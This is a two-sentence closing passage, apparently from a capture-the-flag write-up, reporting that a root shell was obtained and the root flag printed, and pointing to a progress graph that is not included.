And that's it! We managed to get a root shell and print the root flag.
Here we can see the progress graph :
